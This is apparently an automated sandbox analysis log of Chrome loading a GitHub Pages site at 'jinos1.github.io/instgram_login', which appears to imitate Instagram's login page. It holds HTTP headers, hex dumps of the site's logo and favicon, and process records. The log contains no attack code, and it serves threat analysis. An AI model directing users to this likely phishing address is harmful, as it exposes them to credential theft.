                    2025-01-14 00:38:01 UTC1378INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 ce 00 00 00 3a 08 03 00 00 00 cf c2 96 f9 00 00 02 fd 50 4c 54 45 00 00 00 23 1f 20 23 1f 20 ff ff ff 23 20 20 24 1f 24 23 1f 20 27 21 21 40 20 40 23 20 20 24 24 24 24 20 21 23 1f 20 28 22 22 23 1f 20 2b 2b 2b 24 24 24 25 21 21 55 55 55 23 20 21 80 80 80 27 21 21 24 1f 21 24 20 21 25 1f 25 24 1f 20 2e 2e 2e 23 20 23 23 20 21 2e 23 23 23 20 21 29 23 23 40 40 40 28 22 22 23 20 22 25 20 25 26 21 21 24 20 21 23 20 23 24 21 21 29 29 29 24 20 20 23 20 21 25 1f 21 33 33 33 25 22 22 24 20 24 23 20 21 24 1f 21 24 20 21 24 20 21 24 20 20 26 22 22 39 39 39 26 26 26 25 20 22 23 1f 20 27 27 27 26 21 21 28 28 28 23 1f 21 24 20 21 24 24 24 25 1f 22 23 20 22 24 20 20 24 1f 21 23 23 23 23 20 21 24 20 20 24 1f 21 25
                    Data Ascii: PNGIHDR:PLTE# # # $$# '!!@ @# $$$$ !# (""# +++$$$%!!UUU# !'!!$!$ !%%$ ...# ## !.### !)##@@@(""# "% %&!!$ !# #$!!)))$ # !%!333%""$ $# !$!$ !$ !$ &""999&&&% "# '''&!!(((#!$ !$$$%"# "$ $!#### !$ $!%
                    2025-01-14 00:38:01 UTC1378INData Raw: dd 3b 7d dd fa 36 d3 06 53 bc b3 72 c4 8d 1d 7b e6 27 c3 12 0a e0 82 02 2d a1 8c 8e dd c6 7c 83 0b c9 3e 82 f2 bb 85 24 75 4a 8f 9a 74 1a f6 ba 2e 0d b6 c2 cd b5 9f 2d 80 47 74 ed 18 16 5f 02 d7 76 8a 95 30 fe 54 7f 80 2f d8 f8 64 36 92 d2 26 c2 23 30 e2 8b 18 8e db 9f 0c 1c 8b 0e 78 a7 b3 15 fe 57 ec e6 f7 23 fd 03 ba 65 01 eb a6 27 c0 f6 e9 e3 ad 92 21 56 75 7a f2 23 58 5e be ed d9 34 18 6b 49 06 21 ae 36 e9 7c 4b f2 86 0c 88 c3 11 24 83 cd b3 e1 58 14 43 92 e1 c7 e0 78 9b 22 13 ae 5d c3 a9 2e 0b bd 48 f6 bf cb 5d 8f 8c cb a8 82 2d 76 f9 19 f1 e3 2a 00 98 75 e1 96 62 7a 3d aa ae c9 cf 93 51 8b 5b 43 f5 26 d9 2e 09 a8 96 22 7f fb 68 00 48 8b 24 b9 e6 35 38 64 70 45 10 cd 4d 65 1b ec 96 ec b1 7e aa 5f 9c 41 75 88 a2 32 cd d0 17 14 3b e0 88 8f a2 ed 89 66
                    Data Ascii: ;}6Sr{'-|>$uJt.-Gt_v0T/d6&#0xW#e'!Vuz#X^4kI!6|K$XCx"].H]-v*ubz=Q[C&."hH$58dpEMe~_Au2;f
                    2025-01-14 00:38:01 UTC1085INData Raw: 21 f7 51 3d 67 cf d9 67 10 13 d7 c3 a8 41 a1 c3 ed 4f b3 22 18 4b 31 0d c0 87 e4 9b f0 d6 da 3c 64 b2 49 6d 8a a1 9e 29 d9 e8 6d 78 b8 cf bc 6b 46 c1 33 ae ba 81 03 7a af 79 ce ce 7c 09 3b 9a 71 00 87 28 ea 9b cf ad f6 7a 3e 4d 95 05 24 9b d3 ba 66 67 99 74 b2 dc 02 cb 26 50 23 28 5a 00 ad 63 b8 a7 01 6c 8d b4 13 f9 24 82 3d 7a 98 d4 0b a2 28 22 63 01 33 85 9f 9a 7d 7f 9d f7 cb 5c dd 1e 9e 2f db 13 cc d6 18 4f b1 0b aa be a7 c9 39 e5 d9 33 9f 51 24 02 c8 90 e0 9c de bf be 62 18 2f 50 fc ec 5e e1 3c 05 73 4a f9 0c 12 6e 71 a6 d7 ed 13 13 fb 73 6d 28 97 e2 0d ab 9a 2c a7 78 19 62 96 bb bf 81 7c 8a 07 bd 4f 8a 2b a3 b8 ad 00 b6 a4 08 b7 bd ab 45 f7 46 c5 91 66 e6 a5 96 11 41 d3 2f fc 40 d1 ce b9 24 7b 27 e9 21 df 03 63 8c 16 97 24 b3 3a 03 a1 be a4 78 37 f6
                    Data Ascii: !Q=ggAO"K1<dIm)mxkF3zy|;q(z>M$fgt&P#(Zcl$=z("c3}\/O93Q$b/P^<sJnqsm(,xb|O+EFfA/@${'!c$:x7


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    3192.168.2.549721185.199.108.1534433524C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 00:38:02 UTC620OUTGET /instgram_login/insta-fav.ico HTTP/1.1
                    Host: jinos1.github.io
                    Connection: keep-alive
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    sec-ch-ua-mobile: ?0
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    sec-ch-ua-platform: "Windows"
                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                    Sec-Fetch-Site: same-origin
                    Sec-Fetch-Mode: no-cors
                    Sec-Fetch-Dest: image
                    Referer: https://jinos1.github.io/instgram_login/
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    2025-01-14 00:38:02 UTC731INHTTP/1.1 200 OK
                    Connection: close
                    Content-Length: 5430
                    Server: GitHub.com
                    Content-Type: image/vnd.microsoft.icon
                    permissions-policy: interest-cohort=()
                    Last-Modified: Sun, 12 Jan 2025 13:57:20 GMT
                    Access-Control-Allow-Origin: *
                    Strict-Transport-Security: max-age=31556952
                    ETag: "6783ca40-1536"
                    expires: Tue, 14 Jan 2025 00:48:02 GMT
                    Cache-Control: max-age=600
                    x-proxy-cache: MISS
                    X-GitHub-Request-Id: AB2D:9461:3702E7:3B657B:6785B1E5
                    Accept-Ranges: bytes
                    Age: 0
                    Date: Tue, 14 Jan 2025 00:38:02 GMT
                    Via: 1.1 varnish
                    X-Served-By: cache-nyc-kteb1890040-NYC
                    X-Cache: MISS
                    X-Cache-Hits: 0
                    X-Timer: S1736815082.210456,VS0,VE22
                    Vary: Accept-Encoding
                    X-Fastly-Request-ID: 747e81d4301b5328455bf2685fdbed9ef956b81a
                    2025-01-14 00:38:02 UTC1378INData Raw: 00 00 01 00 02 00 10 10 00 00 01 00 20 00 68 04 00 00 26 00 00 00 20 20 00 00 01 00 20 00 a8 10 00 00 8e 04 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 74 d2 fb 39 7d dd ff 72 85 de ff d7 86 e0 ff ff 80 da ff ff 78 d2 fe ff 6c c6 fe ff 5f b3 fd ff 55 9a fc ff 4f 78 f4 d8 54 52 ed 73 65 39 e0 3a 00 00 00 00 00 00 00 00 00 ff ff 01 55 b8 fb 81 64 ca ff fa 6f d6 ff ff 6a d1 ff ff 67 cd fe ff 63 c8 fe ff 5c bf fd ff 53 b1 fc ff 48 9c fb ff 40 80 f7 ff 42 62 f4 ff 57 4d f4 ff 6d 37 e5 fb 7a 2c d8 84 ff 00 ff 01 3b 96 f6 38 43 a4 fc fd 48 b0 fe ff 52 b8 fd ff 92 d6 fe ff b6 e4 ff ff bb e5 ff ff bb e2 fe ff b8 dc fe ff b2 d1 fd ff a8 c0 fb ff 85 90 f5 ff 5a
                    Data Ascii: h& ( t9}rxl_UOxTRse9:Udojgc\SH@BbWMm7z,;8CHRZ
                    2025-01-14 00:38:02 UTC1378INData Raw: 7b d8 fe ff 79 d6 fe ff 76 d3 fe ff 72 cf fe ff 6d ca fe ff 68 c4 fd ff 63 bc fd ff 5d b3 fc ff 57 a8 fc ff 52 9c fa ff 4e 8e f8 ff 4c 7e f5 ff 4c 6e f4 ff 51 5d f7 ff 58 4e f2 ff 60 42 e7 fd 6c 37 e3 cb 73 2f da 52 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 56 b9 fd 74 5f c4 fe fd 65 cb ff ff 66 ca ff ff 6a cd fe ff 6d cf fe ff 6f d1 fe ff 70 d1 fe ff 70 d1 fe ff 6f d0 fe ff 6d ce fe ff 6a cb fe ff 67 c6 fe ff 63 c1 fd ff 5e bb fd ff 59 b3 fc ff 54 a9 fc ff 4f 9e fb ff 4b 91 f9 ff 48 83 f6 ff 47 73 f4 ff 47 62 f1 ff 4c 52 ed ff 55 48 e9 ff 60 3e e5 ff 6f 35 e6 ff 78 2f e0 fe 7b 2e d9 7a 00 00 00 00 00 00 00 00 00 00 00 00 4a a8 f8 4c 4f b2 fe fd 52 b8 ff ff 56 bc fd ff 5a c0 fd ff 5d c4 fe ff 60 c6 fe ff 60 c7 fe ff 5d c6 fe ff 5a c4 fe
                    Data Ascii: {yvrmhc]WRNL~LnQ]XN`Bl7s/RVt_efjmoppomjgc^YTOKHGsGbLRUH`>o5x/{.zJLORVZ]``]Z
                    2025-01-14 00:38:02 UTC1378INData Raw: e2 ff a4 af f2 ff ff ff ff ff a5 b5 f6 ff 34 5b ec ff 3d 65 ef ff 3b 64 f0 ff 3d 62 f0 ff c8 d3 fb ff ff ff ff ff ed ef fe ff 95 9f f6 ff 65 71 f1 ff 68 6f f1 ff 9c 9b f4 ff f0 f0 fd ff ff ff ff ff cc c3 f8 ff 5f 33 e5 ff 68 2c e3 ff 6e 2b e1 ff 67 22 dd ff bf a3 f0 ff ff ff ff ff b7 92 eb ff 74 24 d6 ff 82 2f d8 ff 86 30 d6 ff 89 30 d4 ff 66 50 cd ff 60 53 d3 ff 59 56 d8 ff 4a 4e db ff aa ae f0 ff ff ff ff ff a6 ae f3 ff 3d 53 e7 ff 45 5c eb ff 3d 55 eb ff 87 95 f3 ff ff ff ff ff ed ee fd ff 63 6b ef ff 3a 42 eb ff 44 46 eb ff 48 42 ea ff 44 35 e7 ff 72 60 eb ff f1 ee fd ff ff ff ff ff 9a 73 eb ff 67 23 df ff 70 2b df ff 6a 22 db ff be a0 ef ff ff ff ff ff ba 96 eb ff 76 24 d5 ff 84 2f d7 ff 88 30 d5 ff 8c 2e d3 ff 71 47 c4 ff 6b 4a ca ff 64 4d d1 ff 54
                    Data Ascii: 4[=e;d=beqho_3h,n+g"t$/00fP`SYVJN=SE\=Uck:BDFHBD5r`sg#p+j"v$/0.qGkJdMT
                    2025-01-14 00:38:02 UTC1296INData Raw: 9c 2a bf ff a3 31 c0 ff a5 31 be ff a7 31 bd ff ae 3c 7c d3 af 3c 81 ff aa 3b 82 ff a6 38 85 ff a5 43 90 ff f3 e8 f2 ff ff ff ff ff b9 7e be ff 8d 27 99 ff 95 33 a7 ff 95 35 ad ff 94 35 b1 ff 93 34 b4 ff 92 33 b6 ff 90 33 b8 ff 8e 31 ba ff 8e 31 bb ff 8f 32 bd ff 91 31 be ff 91 2f be ff 90 2c bc ff b4 72 d0 ff bb 83 d3 ff 85 22 b1 ff b7 7d d1 ff ff ff ff ff f1 e3 f6 ff a2 38 be ff a2 2f bc ff a6 32 bb ff a8 32 ba ff ae 33 bc ff b3 3c 76 80 ba 3e 7d ff b0 3c 7c ff ad 3b 7f ff a4 32 7d ff cc 91 bb ff ff ff ff ff f9 f3 f8 ff bc 7f bc ff 98 38 9c ff 93 2d 9d ff 92 2c a1 ff 91 2b a5 ff 90 2a a8 ff 8f 29 ab ff 8f 28 ad ff 90 27 ae ff 91 26 b0 ff 91 25 b0 ff 91 25 b0 ff 8f 23 af ff 88 1c ab ff 8b 26 ad ff b9 7c ce ff fa f5 fb ff ff ff ff ff c8 87 d4 ff a0 29 b4
                    Data Ascii: *111<|<;8C~'3554331121/,r"}8/223<v>}<|;2}8-,+*)('&%%#&|)


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    4192.168.2.549722185.199.110.1534433524C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 00:38:02 UTC373OUTGET /instgram_login/instagram-logo.png HTTP/1.1
                    Host: jinos1.github.io
                    Connection: keep-alive
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    Accept: */*
                    Sec-Fetch-Site: none
                    Sec-Fetch-Mode: cors
                    Sec-Fetch-Dest: empty
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    2025-01-14 00:38:02 UTC716INHTTP/1.1 200 OK
                    Connection: close
                    Content-Length: 3841
                    Server: GitHub.com
                    Content-Type: image/png
                    permissions-policy: interest-cohort=()
                    Last-Modified: Sun, 12 Jan 2025 13:57:20 GMT
                    Access-Control-Allow-Origin: *
                    Strict-Transport-Security: max-age=31556952
                    ETag: "6783ca40-f01"
                    expires: Tue, 14 Jan 2025 00:48:01 GMT
                    Cache-Control: max-age=600
                    x-proxy-cache: MISS
                    X-GitHub-Request-Id: B8B6:29FFED:371F50:3D223B:6785B1E9
                    Accept-Ranges: bytes
                    Date: Tue, 14 Jan 2025 00:38:02 GMT
                    Via: 1.1 varnish
                    Age: 1
                    X-Served-By: cache-ewr-kewr1740038-EWR
                    X-Cache: HIT
                    X-Cache-Hits: 1
                    X-Timer: S1736815082.295604,VS0,VE16
                    Vary: Accept-Encoding
                    X-Fastly-Request-ID: 6e8073756db18482f064d46528b7bf284e1644a7
                    2025-01-14 00:38:02 UTC1378INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 ce 00 00 00 3a 08 03 00 00 00 cf c2 96 f9 00 00 02 fd 50 4c 54 45 00 00 00 23 1f 20 23 1f 20 ff ff ff 23 20 20 24 1f 24 23 1f 20 27 21 21 40 20 40 23 20 20 24 24 24 24 20 21 23 1f 20 28 22 22 23 1f 20 2b 2b 2b 24 24 24 25 21 21 55 55 55 23 20 21 80 80 80 27 21 21 24 1f 21 24 20 21 25 1f 25 24 1f 20 2e 2e 2e 23 20 23 23 20 21 2e 23 23 23 20 21 29 23 23 40 40 40 28 22 22 23 20 22 25 20 25 26 21 21 24 20 21 23 20 23 24 21 21 29 29 29 24 20 20 23 20 21 25 1f 21 33 33 33 25 22 22 24 20 24 23 20 21 24 1f 21 24 20 21 24 20 21 24 20 20 26 22 22 39 39 39 26 26 26 25 20 22 23 1f 20 27 27 27 26 21 21 28 28 28 23 1f 21 24 20 21 24 24 24 25 1f 22 23 20 22 24 20 20 24 1f 21 23 23 23 23 20 21 24 20 20 24 1f 21 25
                    Data Ascii: PNGIHDR:PLTE# # # $$# '!!@ @# $$$$ !# (""# +++$$$%!!UUU# !'!!$!$ !%%$ ...# ## !.### !)##@@@(""# "% %&!!$ !# #$!!)))$ # !%!333%""$ $# !$!$ !$ !$ &""999&&&% "# '''&!!(((#!$ !$$$%"# "$ $!#### !$ $!%
                    2025-01-14 00:38:02 UTC1378INData Raw: dd 3b 7d dd fa 36 d3 06 53 bc b3 72 c4 8d 1d 7b e6 27 c3 12 0a e0 82 02 2d a1 8c 8e dd c6 7c 83 0b c9 3e 82 f2 bb 85 24 75 4a 8f 9a 74 1a f6 ba 2e 0d b6 c2 cd b5 9f 2d 80 47 74 ed 18 16 5f 02 d7 76 8a 95 30 fe 54 7f 80 2f d8 f8 64 36 92 d2 26 c2 23 30 e2 8b 18 8e db 9f 0c 1c 8b 0e 78 a7 b3 15 fe 57 ec e6 f7 23 fd 03 ba 65 01 eb a6 27 c0 f6 e9 e3 ad 92 21 56 75 7a f2 23 58 5e be ed d9 34 18 6b 49 06 21 ae 36 e9 7c 4b f2 86 0c 88 c3 11 24 83 cd b3 e1 58 14 43 92 e1 c7 e0 78 9b 22 13 ae 5d c3 a9 2e 0b bd 48 f6 bf cb 5d 8f 8c cb a8 82 2d 76 f9 19 f1 e3 2a 00 98 75 e1 96 62 7a 3d aa ae c9 cf 93 51 8b 5b 43 f5 26 d9 2e 09 a8 96 22 7f fb 68 00 48 8b 24 b9 e6 35 38 64 70 45 10 cd 4d 65 1b ec 96 ec b1 7e aa 5f 9c 41 75 88 a2 32 cd d0 17 14 3b e0 88 8f a2 ed 89 66
                    Data Ascii: ;}6Sr{'-|>$uJt.-Gt_v0T/d6&#0xW#e'!Vuz#X^4kI!6|K$XCx"].H]-v*ubz=Q[C&."hH$58dpEMe~_Au2;f
                    2025-01-14 00:38:02 UTC1085INData Raw: 21 f7 51 3d 67 cf d9 67 10 13 d7 c3 a8 41 a1 c3 ed 4f b3 22 18 4b 31 0d c0 87 e4 9b f0 d6 da 3c 64 b2 49 6d 8a a1 9e 29 d9 e8 6d 78 b8 cf bc 6b 46 c1 33 ae ba 81 03 7a af 79 ce ce 7c 09 3b 9a 71 00 87 28 ea 9b cf ad f6 7a 3e 4d 95 05 24 9b d3 ba 66 67 99 74 b2 dc 02 cb 26 50 23 28 5a 00 ad 63 b8 a7 01 6c 8d b4 13 f9 24 82 3d 7a 98 d4 0b a2 28 22 63 01 33 85 9f 9a 7d 7f 9d f7 cb 5c dd 1e 9e 2f db 13 cc d6 18 4f b1 0b aa be a7 c9 39 e5 d9 33 9f 51 24 02 c8 90 e0 9c de bf be 62 18 2f 50 fc ec 5e e1 3c 05 73 4a f9 0c 12 6e 71 a6 d7 ed 13 13 fb 73 6d 28 97 e2 0d ab 9a 2c a7 78 19 62 96 bb bf 81 7c 8a 07 bd 4f 8a 2b a3 b8 ad 00 b6 a4 08 b7 bd ab 45 f7 46 c5 91 66 e6 a5 96 11 41 d3 2f fc 40 d1 ce b9 24 7b 27 e9 21 df 03 63 8c 16 97 24 b3 3a 03 a1 be a4 78 37 f6
                    Data Ascii: !Q=ggAO"K1<dIm)mxkF3zy|;q(z>M$fgt&P#(Zcl$=z("c3}\/O93Q$b/P^<sJnqsm(,xb|O+EFfA/@${'!c$:x7


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    5192.168.2.549723185.199.110.1534433524C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 00:38:02 UTC368OUTGET /instgram_login/insta-fav.ico HTTP/1.1
                    Host: jinos1.github.io
                    Connection: keep-alive
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    Accept: */*
                    Sec-Fetch-Site: none
                    Sec-Fetch-Mode: cors
                    Sec-Fetch-Dest: empty
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    2025-01-14 00:38:02 UTC729INHTTP/1.1 200 OK
                    Connection: close
                    Content-Length: 5430
                    Server: GitHub.com
                    Content-Type: image/vnd.microsoft.icon
                    permissions-policy: interest-cohort=()
                    Last-Modified: Sun, 12 Jan 2025 13:57:20 GMT
                    Access-Control-Allow-Origin: *
                    Strict-Transport-Security: max-age=31556952
                    ETag: "6783ca40-1536"
                    expires: Tue, 14 Jan 2025 00:48:02 GMT
                    Cache-Control: max-age=600
                    x-proxy-cache: MISS
                    X-GitHub-Request-Id: AB2D:9461:3702E7:3B657B:6785B1E5
                    Accept-Ranges: bytes
                    Date: Tue, 14 Jan 2025 00:38:02 GMT
                    Via: 1.1 varnish
                    Age: 1
                    X-Served-By: cache-nyc-kteb1890078-NYC
                    X-Cache: HIT
                    X-Cache-Hits: 1
                    X-Timer: S1736815083.860927,VS0,VE1
                    Vary: Accept-Encoding
                    X-Fastly-Request-ID: f5ca46fe11dba9008398c58b2dae4a87c05e2258
                    2025-01-14 00:38:02 UTC1378INData Raw: 00 00 01 00 02 00 10 10 00 00 01 00 20 00 68 04 00 00 26 00 00 00 20 20 00 00 01 00 20 00 a8 10 00 00 8e 04 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 74 d2 fb 39 7d dd ff 72 85 de ff d7 86 e0 ff ff 80 da ff ff 78 d2 fe ff 6c c6 fe ff 5f b3 fd ff 55 9a fc ff 4f 78 f4 d8 54 52 ed 73 65 39 e0 3a 00 00 00 00 00 00 00 00 00 ff ff 01 55 b8 fb 81 64 ca ff fa 6f d6 ff ff 6a d1 ff ff 67 cd fe ff 63 c8 fe ff 5c bf fd ff 53 b1 fc ff 48 9c fb ff 40 80 f7 ff 42 62 f4 ff 57 4d f4 ff 6d 37 e5 fb 7a 2c d8 84 ff 00 ff 01 3b 96 f6 38 43 a4 fc fd 48 b0 fe ff 52 b8 fd ff 92 d6 fe ff b6 e4 ff ff bb e5 ff ff bb e2 fe ff b8 dc fe ff b2 d1 fd ff a8 c0 fb ff 85 90 f5 ff 5a
                    Data Ascii: h& ( t9}rxl_UOxTRse9:Udojgc\SH@BbWMm7z,;8CHRZ
                    2025-01-14 00:38:02 UTC1378INData Raw: 7b d8 fe ff 79 d6 fe ff 76 d3 fe ff 72 cf fe ff 6d ca fe ff 68 c4 fd ff 63 bc fd ff 5d b3 fc ff 57 a8 fc ff 52 9c fa ff 4e 8e f8 ff 4c 7e f5 ff 4c 6e f4 ff 51 5d f7 ff 58 4e f2 ff 60 42 e7 fd 6c 37 e3 cb 73 2f da 52 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 56 b9 fd 74 5f c4 fe fd 65 cb ff ff 66 ca ff ff 6a cd fe ff 6d cf fe ff 6f d1 fe ff 70 d1 fe ff 70 d1 fe ff 6f d0 fe ff 6d ce fe ff 6a cb fe ff 67 c6 fe ff 63 c1 fd ff 5e bb fd ff 59 b3 fc ff 54 a9 fc ff 4f 9e fb ff 4b 91 f9 ff 48 83 f6 ff 47 73 f4 ff 47 62 f1 ff 4c 52 ed ff 55 48 e9 ff 60 3e e5 ff 6f 35 e6 ff 78 2f e0 fe 7b 2e d9 7a 00 00 00 00 00 00 00 00 00 00 00 00 4a a8 f8 4c 4f b2 fe fd 52 b8 ff ff 56 bc fd ff 5a c0 fd ff 5d c4 fe ff 60 c6 fe ff 60 c7 fe ff 5d c6 fe ff 5a c4 fe
                    Data Ascii: {yvrmhc]WRNL~LnQ]XN`Bl7s/RVt_efjmoppomjgc^YTOKHGsGbLRUH`>o5x/{.zJLORVZ]``]Z
                    2025-01-14 00:38:02 UTC1378INData Raw: e2 ff a4 af f2 ff ff ff ff ff a5 b5 f6 ff 34 5b ec ff 3d 65 ef ff 3b 64 f0 ff 3d 62 f0 ff c8 d3 fb ff ff ff ff ff ed ef fe ff 95 9f f6 ff 65 71 f1 ff 68 6f f1 ff 9c 9b f4 ff f0 f0 fd ff ff ff ff ff cc c3 f8 ff 5f 33 e5 ff 68 2c e3 ff 6e 2b e1 ff 67 22 dd ff bf a3 f0 ff ff ff ff ff b7 92 eb ff 74 24 d6 ff 82 2f d8 ff 86 30 d6 ff 89 30 d4 ff 66 50 cd ff 60 53 d3 ff 59 56 d8 ff 4a 4e db ff aa ae f0 ff ff ff ff ff a6 ae f3 ff 3d 53 e7 ff 45 5c eb ff 3d 55 eb ff 87 95 f3 ff ff ff ff ff ed ee fd ff 63 6b ef ff 3a 42 eb ff 44 46 eb ff 48 42 ea ff 44 35 e7 ff 72 60 eb ff f1 ee fd ff ff ff ff ff 9a 73 eb ff 67 23 df ff 70 2b df ff 6a 22 db ff be a0 ef ff ff ff ff ff ba 96 eb ff 76 24 d5 ff 84 2f d7 ff 88 30 d5 ff 8c 2e d3 ff 71 47 c4 ff 6b 4a ca ff 64 4d d1 ff 54
                    Data Ascii: 4[=e;d=beqho_3h,n+g"t$/00fP`SYVJN=SE\=Uck:BDFHBD5r`sg#p+j"v$/0.qGkJdMT
                    2025-01-14 00:38:02 UTC1296INData Raw: 9c 2a bf ff a3 31 c0 ff a5 31 be ff a7 31 bd ff ae 3c 7c d3 af 3c 81 ff aa 3b 82 ff a6 38 85 ff a5 43 90 ff f3 e8 f2 ff ff ff ff ff b9 7e be ff 8d 27 99 ff 95 33 a7 ff 95 35 ad ff 94 35 b1 ff 93 34 b4 ff 92 33 b6 ff 90 33 b8 ff 8e 31 ba ff 8e 31 bb ff 8f 32 bd ff 91 31 be ff 91 2f be ff 90 2c bc ff b4 72 d0 ff bb 83 d3 ff 85 22 b1 ff b7 7d d1 ff ff ff ff ff f1 e3 f6 ff a2 38 be ff a2 2f bc ff a6 32 bb ff a8 32 ba ff ae 33 bc ff b3 3c 76 80 ba 3e 7d ff b0 3c 7c ff ad 3b 7f ff a4 32 7d ff cc 91 bb ff ff ff ff ff f9 f3 f8 ff bc 7f bc ff 98 38 9c ff 93 2d 9d ff 92 2c a1 ff 91 2b a5 ff 90 2a a8 ff 8f 29 ab ff 8f 28 ad ff 90 27 ae ff 91 26 b0 ff 91 25 b0 ff 91 25 b0 ff 8f 23 af ff 88 1c ab ff 8b 26 ad ff b9 7c ce ff fa f5 fb ff ff ff ff ff c8 87 d4 ff a0 29 b4
                    Data Ascii: *111<|<;8C~'3554331121/,r"}8/223<v>}<|;2}8-,+*)('&%%#&|)


                    Click to jump to process

                    Click to jump to process

                    Click to jump to process

                    Target ID:0
                    Start time:19:37:50
                    Start date:13/01/2025
                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                    Imagebase:0x7ff715980000
                    File size:3'242'272 bytes
                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low
                    Has exited:false

                    Target ID:2
                    Start time:19:37:52
                    Start date:13/01/2025
                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2536 --field-trial-handle=2472,i,5502028708574582468,12572391490374655255,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                    Imagebase:0x7ff715980000
                    File size:3'242'272 bytes
                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low
                    Has exited:false

                    Target ID:3
                    Start time:19:37:58
                    Start date:13/01/2025
                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "http://jinos1.github.io/instgram_login"
                    Imagebase:0x7ff715980000
                    File size:3'242'272 bytes
                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low
                    Has exited:true

                    No disassembly